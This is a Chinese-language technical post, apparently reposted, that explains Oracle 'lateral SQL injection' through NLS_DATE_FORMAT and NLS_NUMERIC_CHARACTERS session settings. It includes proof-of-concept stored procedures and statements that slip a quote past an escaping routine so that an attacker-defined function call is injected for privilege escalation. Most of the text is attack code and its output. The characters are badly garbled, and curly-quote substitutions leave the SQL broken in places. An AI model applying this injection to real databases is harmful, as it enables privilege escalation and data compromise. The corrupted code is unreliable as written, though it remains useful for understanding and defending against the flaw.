ORACLE LATERAL-SQL-INJECTION 個(gè)人見解
2024-08-29 13:56:35
供稿:網(wǎng)友
如果直接執(zhí)行SQL語句或者參數(shù)綁定則不用擔(dān)心太多����,
如以下ORACLE存儲(chǔ)過程
create or replace procedure kjdatepoc(date d)
as
begin
insert into kjdatetable values(d);
commit;
end;
根本不需要擔(dān)心遭受到SQL新型注入攻擊��,那么在什么地方會(huì)發(fā)生DATE 以及 NUMBER的注入攻擊呢?���??一般都是采用了動(dòng)態(tài)SQL而又不采用參數(shù)綁定的語句。
例如工程師經(jīng)常用的DBMS_SQL或者EXECUTE IMMEDIATE
看以下存儲(chǔ)過程
create or replace procedure kjdatepoc(date d)
as
begin
execute immediate ‘insert into kjdatetable values('|| d ||')';
commit;
end;
那么遇到以上的存儲(chǔ)過程或者函數(shù)等,也通過修改SESSION中的NLS_DATE_FORMAT中的值達(dá)到SQL注射的目的����,
老外的PAPER講解得非常詳細(xì)了 ,我在這里也不廢話����。
惟獨(dú)對(duì)于 NUMBER類型的注射沒有多作講解 只是簡單演示了可以輸出單引號(hào)�!
看以下語句
ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
SELECT to_number(1000.10001,'999999D99999′)||” FROM DUAL;
輸出一下結(jié)果
1000′10001
只是多了一個(gè)單引號(hào)�,那有什么用呢?樂觀的來說!在特定情況下是很有價(jià)值的���!看以下一個(gè)存儲(chǔ)過程
create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)
is
SecStr varchar2(1000);
begin
SecStr:=replace(kjexpstr,””,”””);
sys.dbms_output.put_line('SELECT * FROM DUAL WHERE and name=”'||SecStr||””);
end;
內(nèi)部對(duì)varchar類型進(jìn)行替換了!我們可以進(jìn)行測(cè)試
begin
numinjpoc(1000,”'–');
end;
其輸出SQL語句為
SELECT * FROM DUAL WHERE ID=1000 and name=”'–'
單引號(hào)被轉(zhuǎn)義掉了
那么如果我們結(jié)合這個(gè)NUMBER類型怎么進(jìn)行注射呢?
ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
begin
numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');
end;
看看輸出結(jié)果
SELECT * FROM DUAL WHERE||kj.exp()–'
這樣就可以間接的攻擊它…
在某中程度才來需要ALTER SESSION 配合后�,再去攻擊系統(tǒng)內(nèi)部的一些函數(shù)或者過程來提升權(quán)限�����。未嘗不是一種好的突破思路,但是對(duì)于單語句進(jìn)行SQL注射攻擊��,以結(jié)果為向?qū)У脑?���!這樣的方式?jīng)]多大作為。
